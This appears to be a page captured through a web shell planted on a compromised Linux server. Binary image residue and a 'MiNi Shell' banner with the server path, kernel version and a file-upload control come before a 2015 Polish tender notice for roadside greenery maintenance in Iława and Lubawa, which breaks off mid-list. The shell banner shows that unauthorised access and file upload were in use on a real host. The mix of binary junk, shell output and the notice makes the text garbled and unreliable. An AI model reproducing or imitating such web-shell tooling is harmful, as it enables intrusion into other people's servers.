JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150401/72908-N-2015.html

<p class="kh_header"><b>Iława: Utrzymanie zieleni w pasie drogowym dróg - ulic powiatowych na terenie miasta Iława i Lubawa</b><br>
<b>Numer ogłoszenia: 72908 - 2015; data zamieszczenia: 01.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Iławie , ul. Tadeusza Kościuszki 33A, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6485468, faks 89 644 80 66.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni w pasie drogowym dróg - ulic powiatowych na terenie miasta Iława i Lubawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są bieżące usługi utrzymania zieleni w pasie drogowym dróg - ulic powiatowych na terenie miasta Iława i Lubawa w poniższym zakresie:
ZADANIE NR 1 - usługi świadczone na terenie miasta Iława
a)	Utrzymanie trawników wraz z uprzątnięciem chodników i jezdni.
W zakresie utrzymania trawników wchodzą prace związane z koszeniem trawy, chwastów, a także wykoszeniem trawy wokół drzew i krzewów. Pozostała po koszeniu trawa i samosiewy winny być zabrane (wygrabione) z terenu zielonego, przyległych chodników i jezdni oraz przetransportowane na składowisko odpadów. Przed przystąpieniem do każdego koszenia należy usunąć z trawy: chwasty, kamienie, gruz, puszki metalowe lub inne zanieczyszczenia.
b)	Formowanie koron drzew.
W ramach tego zadania należy dokonać cięć formujących korony drzew oraz uprzątnąć teren wokół drzewa wraz z wywozem gałęzi na składowisko odpadów.
c)	Utrzymanie drzew młodych.
W ramach utrzymania drzew młodych należy wykonać prace polegające na:
- podlewaniu wodą,
- zabezpieczeniu roślin preparatami chemicznymi przed chorobami grzybowymi i szkodnikami,
- usuwaniu suchych, nadłamanych oraz zwisających gałęzi (miejsca po ściętych gałęziach należy zabezpieczyć preparatem grzybobójczym),
- usunięciu odrostów z pni drzew oraz szyj korzeniowych.
Usunięte odrosty i gałęzie drzew należy złożyć w stosy oraz przetransportować na składowisko odpadów.
d)	Utrzymanie krzewów starszych.
W ramach utrzymania starszych krzewów należy dokonać cięcia formującego (maksymalnie do 30 % objętości krzewu) oraz cięcia pielęgnacyjnego polegającego na wycinaniu suchych, porażonych i połamanych gałęzi. Krzewy po przycięciu muszą zachować nadal funkcję estetyczną.
e)	Utrzymanie krzewów młodszych.
W zakresie utrzymania młodszych krzewów należy wykonać prace polegające na:
- podlewaniu wodą,
- zabezpieczeniu roślin preparatami chemicznymi przed chorobami grzybowymi i szkodnikami,
- wykonaniu cięć formujących (maksymalnie do 30 % objętości krzewu) oraz cięć pielęgnacyjnych tj.  wycinaniu suchych, porażonych i połamanych gałęzi (krzewy po przycięciu muszą zachować nadal funkcję estetyczną).
Usunięte odrosty i gałęzie krzewów należy złożyć w stosy oraz przetransportować na składowisko odpadów.
f)	Utrzymanie żywopłotów liściastych.
Utrzymanie żywopłotów liściastych będzie polegało na wykonaniu cięć formujących żywopłotów, wycięciu suchych, porażonych i połamanych gałęzi oraz wypieleniu chwastów lub skoszeniu trawy wokół żywopłotu, a następnie złożeniu usuniętych elementów w stosy oraz transport na składowisko. Żywopłoty po przycięciu muszą zachować nadal funkcję estetyczną.
g)	Utrzymanie kwietników obsadzonych różami i bylinami.
W ramach utrzymania kwietników obsadzonych różami i bylinami, należy je podlać, wypielić i oczyścić z chwastów oraz obciąć przekwitłe kwiatostany. Po wykonaniu pielenia należy uzupełnić kwietnik ziemią urodzajną. Odpady powstałe w wyniku prac pielęgnacyjnych należy przewieźć na składowisko. Przed przystąpieniem do wykonywania usługi należy uprzątnąć stroisz z kwiatów, zaś w okresie jesiennym należy zabezpieczyć rośliny przed przemarzaniem w kresie zimowym (np. stroiszem).
h)	Grabienie, uprzątnięcie i wywóz liści.     
W ramach tej części zadania należy wygrabić (uprzątnąć) liście z terenów zielonych, ułożyć w stosy oraz przetransportować na składowisko śmieci.

ZADANIE NR 2 - usługi świadczone na terenie miasta Lubawa
a)	Utrzymanie trawników wraz z uprzątnięciem chodników i jezdni.
W zakresie utrzymania trawników wchodzą prace związane z koszeniem trawy, chwastów, a także wykoszeniem trawy wokół drzew i krzewów. Pozostała po koszeniu trawa i samosiewy winny być zabrane (wygrabione) z terenu zielonego, przyległych chodników i jezdni oraz przetransportowane na składowisko odpadów. Przed przystąpieniem do każdego koszenia należy usunąć z trawy: chwasty, kamienie, gruz, puszki metalowe lub inne zanieczyszczenia.
b)	Utrzymanie drzew młodych.
W ramach utrzymania drzew młodych należy wykonać prace polegające na:
- podlewaniu wodą,
- zabezpieczeniu roślin preparatami chemicznymi przed chorobami grzybowymi i szkodnikami,
- usuwaniu suchych, nadłamanych oraz zwisających gałęzi (miejsca po ściętych gałęziach należy zabezpieczyć preparatem grzybobójczym),
- usunięciu odrostów z pni drzew oraz szyj korzeniowych.
Usunięte odrosty i gałęzie drzew należy złożyć w stosy oraz przetransportować na składowisko odpadów.
c)	Utrzymanie żywopłotów liściastych.
Utrzymanie żywopłotów liściastych będzie polegało na wykonaniu cięć formujących żywopłotów, wycięciu suchych, porażonych i połamanych gałęzi oraz wypieleniu chwastów lub skoszeniu trawy wokół żywopłotu, a następnie złożeniu usuniętych elementów w stosy oraz transport na składowisko. Żywopłoty po przycięciu muszą zachować nadal funkcję estetyczną.
d)	Grabienie, uprzątnięcie i wywóz liści.     
W ramach tej części zadania należy wygrabić (uprzątnąć) liście z terenów zielonych, ułożyć w stosy oraz przetransportować na składowisko śmieci..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5, 77.34.20.00-9, 77.31.20.00-0, 77.21.15.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku wskazanego w pkt. V ust. 1 lit. a) SIWZ, posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, Wykonawca  złoży oświadczenie  o spełnianiu warunku wg załącznika nr 2, o którym mowa w pkt. VI. ust. 1 ppkt. 2) SWIZ. 
Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunku wg załącznika nr 2, o którym mowa w punkcie VI ust.1 ppkt. 2) SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania wiedzy i doświadczenia zamawiający, żąda by wykonawca złożył wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich 3 lat, (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed upływem terminu składania ofert, w tym 1 usługi odpowiadającej swoim rodzajem usługom stanowiącym przedmiot zamówienia, wraz z podaniem wartości usług, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane. Przez usługę odpowiadającą rodzajem usługom stanowiącym przedmiot zamówienia, należy rozumieć usługę utrzymania zieleni prowadzoną przez jeden okres wegetacyjny. Ponadto wykonawca złoży oświadczenie, że dysponuje wiedzą i doświadczeniem potrzebnym do wykonania zamówienia.
Ocena spełniania warunków szczegółowych będzie dokonana na podstawie złożonego przez Wykonawcę wypełnionego formularza Doświadczenie wykonawcy, który stanowi załącznik Nr 3 do SIWZ, o którym mowa w pkt. VI ust.1 ppkt. 8 SIWZ oraz złożonego oświadczenia o spełnieniu warunku zgodnie z wzorem Nr 2, o którym mowa w pkt. VI ust.1 pkt.2) SIWZ, że dysponuje wiedzą i doświadczeniem potrzebnym do wykonania zamówienia. 
Do wzmiankowanego Formularza (załącznik Nr 3) należy dołączyć dowody, potwierdzające czy usługi te zostały wykonane lub są wykonywane należycie. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania odpowiednim potencjałem technicznym wykonawca złoży oświadczenie o spełnianiu warunku wg załącznika nr 2, o którym mowa w pkt. VI. ust. 1 ppkt. 2) SWIZ. Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunku wg załącznika nr 2, o którym mowa w punkcie VI ust.1 ppkt. 2) SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania osobami zdolnymi do wykonania zmówienia wykonawca złoży oświadczenie o spełnianiu warunku wg załącznika nr 2, o którym mowa w pkt. VI. ust. 1 ppkt. 2) SWIZ. Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunku wg załącznika nr 2, o którym mowa w punkcie VI ust.1 ppkt. 2) SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku wskazanego w punkcie V ust. 1 lit. d) znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia dla wykazania, wykonawca spełnia warunek zamawiający żąda, by wykonawca: złożył kserokopię opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia oraz oświadczenie o spełnieniu warunku zgodnie z załącznikiem nr 2, o którym mowa w pkt. VI ust.1 ppkt.2) SIWZ, że znajduje się sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. Ocena spełniania warunku nastąpi na podstawie załączonej kserokopii dokumentu, o którym mowa w pkt. VI ust.1 ppkt. 12) oraz załączonego do oferty oświadczenia wymienionego w pkt. VI ust.1 ppkt.2) SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy- wg załącznika nr 1 (odrębny na każde zadanie),wykaz prac zleconych podwykonawcom wg załącznika nr 4,Pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu wymienionego w pkt. VI ust. 1 ppkt. 4 SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień niniejszej umowy może nastąpić za zgodą obydwu stron wyrażoną na piśmie, w formie aneksu do umowy z zachowaniem formy pisemnej pod rygorem nieważności takiej zmiany. 2. Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty: 1) wystąpienia okoliczności, których nie można było przewidzieć pomimo zachowania należytej staranności, 2) zmiany terminu realizacji umowy w przypadku zawieszenia realizacji przedmiotu umowy przez zamawiającego, 3) zamiany terminu realizacji umowy w przypadku działania siły wyższej (np. klęski żywiołowe, strajki), mającej bezpośredni wpływ na terminowość przedmiotu zamówienia, 4) wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy, 5) zmiany podwykonawców, pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca, 6) Zmiany urzędowej stawki podatku VAT. 3. W przypadkach wystąpienia okoliczności określonych w ust. 2 strony ustalą nowe terminy realizacji, z tym, że minimalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_ilawski/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Iławie ul. Tadeusza Kościuszki 33A,14-200 Iława.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2015 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Iławie, ul. Tadeusza Kościuszki 33A, 14-200 Iława, pok. Nr 4..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi świadczone na terenie miasta Iława.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Utrzymanie trawników wraz z uprzątnięciem chodników i jezdni.
W zakresie utrzymania trawników wchodzą prace związane z koszeniem trawy, chwastów, a także wykoszeniem trawy wokół drzew i krzewów. Pozostała po koszeniu trawa i samosiewy winny być zabrane (wygrabione) z terenu zielonego, przyległych chodników i jezdni oraz przetransportowane na składowisko odpadów. Przed przystąpieniem do każdego koszenia należy usunąć z trawy: chwasty, kamienie, gruz, puszki metalowe lub inne zanieczyszczenia.
b)	Formowanie koron drzew.
W ramach tego zadania należy dokonać cięć formujących korony drzew oraz uprzątnąć teren wokół drzewa wraz z wywozem gałęzi na składowisko odpadów.
c)	Utrzymanie drzew młodych.
W ramach utrzymania drzew młodych należy wykonać prace polegające na:
- podlewaniu wodą,
- zabezpieczeniu roślin preparatami chemicznymi przed chorobami grzybowymi i szkodnikami,
- usuwaniu suchych, nadłamanych oraz zwisających gałęzi (miejsca po ściętych gałęziach należy zabezpieczyć preparatem grzybobójczym),
- usunięciu odrostów z pni drzew oraz szyj korzeniowych.
Usunięte odrosty i gałęzie drzew należy złożyć w stosy oraz przetransportować na składowisko odpadów.
d)	Utrzymanie krzewów starszych.
W ramach utrzymania starszych krzewów należy dokonać cięcia formującego (maksymalnie do 30 % objętości krzewu) oraz cięcia pielęgnacyjnego polegającego na wycinaniu suchych, porażonych i połamanych gałęzi. Krzewy po przycięciu muszą zachować nadal funkcję estetyczną.
e)	Utrzymanie krzewów młodszych.
W zakresie utrzymania młodszych krzewów należy wykonać prace polegające na:
- podlewaniu wodą,
- zabezpieczeniu roślin preparatami chemicznymi przed chorobami grzybowymi i szkodnikami,
- wykonaniu cięć formujących (maksymalnie do 30 % objętości krzewu) oraz cięć pielęgnacyjnych tj.  wycinaniu suchych, porażonych i połamanych gałęzi (krzewy po przycięciu muszą zachować nadal funkcję estetyczną).
Usunięte odrosty i gałęzie krzewów należy złożyć w stosy oraz przetransportować na składowisko odpadów.
f)	Utrzymanie żywopłotów liściastych.
Utrzymanie żywopłotów liściastych będzie polegało na wykonaniu cięć formujących żywopłotów, wycięciu suchych, porażonych i połamanych gałęzi oraz wypieleniu chwastów lub skoszeniu trawy wokół żywopłotu, a następnie złożeniu usuniętych elementów w stosy oraz transport na składowisko. Żywopłoty po przycięciu muszą zachować nadal funkcję estetyczną.
g)	Utrzymanie kwietników obsadzonych różami i bylinami.
W ramach utrzymania kwietników obsadzonych różami i bylinami, należy je podlać, wypielić i oczyścić z chwastów oraz obciąć przekwitłe kwiatostany. Po wykonaniu pielenia należy uzupełnić kwietnik ziemią urodzajną. Odpady powstałe w wyniku prac pielęgnacyjnych należy przewieźć na składowisko. Przed przystąpieniem do wykonywania usługi należy uprzątnąć stroisz z kwiatów, zaś w okresie jesiennym należy zabezpieczyć rośliny przed przemarzaniem w kresie zimowym (np. stroiszem).
h)	Grabienie, uprzątnięcie i wywóz liści.     
W ramach tej części zadania należy wygrabić (uprzątnąć) liście z terenów zielonych, ułożyć w stosy oraz przetransportować na składowisko śmieci..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5, 77.34.20.00-9, 77.31.20.00-0, 77.21.15.00-7.</p></li>
